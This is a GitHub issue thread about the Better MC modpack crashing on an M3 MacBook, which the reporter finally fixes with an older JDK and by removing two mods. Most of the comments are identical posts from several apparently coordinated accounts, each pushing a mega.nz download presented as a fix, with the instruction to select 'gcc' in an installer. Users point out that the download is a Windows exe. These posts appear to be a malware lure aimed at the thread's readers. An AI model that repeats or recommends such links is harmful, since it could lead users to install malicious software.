### ISSUE TITLE
The Game Crashes on MacBook Pro(M3)

### ISSUE THREAD

**Issue by CarbonBlaack** [LunaPixelStudios/Better-MC#1812]
### Describe the Bug

I'm using a Macbook Pro M3. I've installed Better MC modpack through the curse forge and when I try to create a singleplayer world it crashes before I enter the world. Just like the same error with issue #1802 and #1792, I saw the solution inter issues and really thank the authors for their help. But Actually the solution isn't work in my circumstances. I did everything as the solution but I can not open the game with Atluncher. I download the zulu21.36.17-ca-jdk21.0.4-macosx_aarch64.dmg, install the Atluncher and changed the java path to '/Library/Java/JavaVirtualMachines/zulu-21.jdk/Contents/Home\'. BTW, I can not understand the log provided by Atluncher. Can anybody help me?

The important error message in the log is "[25/08/2024 15:53:39 下午] Exception in thread "main" java.lang.ClassCastException: class jdk.internal.loader.ClassLoaders$AppClassLoader cannot be cast to class java.net.URLClassLoader (jdk.internal.loader.ClassLoaders$AppClassLoader and java.net.URLClassLoader are in module java.base of loader 'bootstrap')". But I don't know how to solve it.

### Reproduction Steps

launch minecraft with the modpack, try to create a singleplayer world, crashes before entering the world
find the issue and the solution, follow it, but it crushes after I launch the game with Atluncher

### Screenshots and Videos

I set the Atluncher like this.
![image](https://github.com/user-attachments/assets/6c76c90c-4e9a-49b0-842c-5670332f36e6)

The game crashes in this step.
![image](https://github.com/user-attachments/assets/4aa45089-5cdb-4604-a4c1-847182b3e787)

### Crash Report or Log

https://github.com/CarbonBlaack/log/blob/main/log_atluncher

### Operating System

macOS Sonoma 14.6

### Minecraft Version

1.20.1

### Modloader

Forge

### Modpack Version

v30.5

### Other Mods

No

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by domis23** [comment]
I have exactly same issue, but I am not sure how should i open exe file on macos. Maybe I didnt catch something can someone clear things for me?

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by CarbonBlaack** [comment]
thanks, but in the zip file there is an exe file. Actually I use Macbook and from my knowledge, I can not open an exe file to install something on it. Can somebody help me?

**Comment by CarbonBlaack** [comment]
thanks @domis23! I finally solve the problem after check the issue #1713. Downloading the old jdk and remove those two mods work for me.
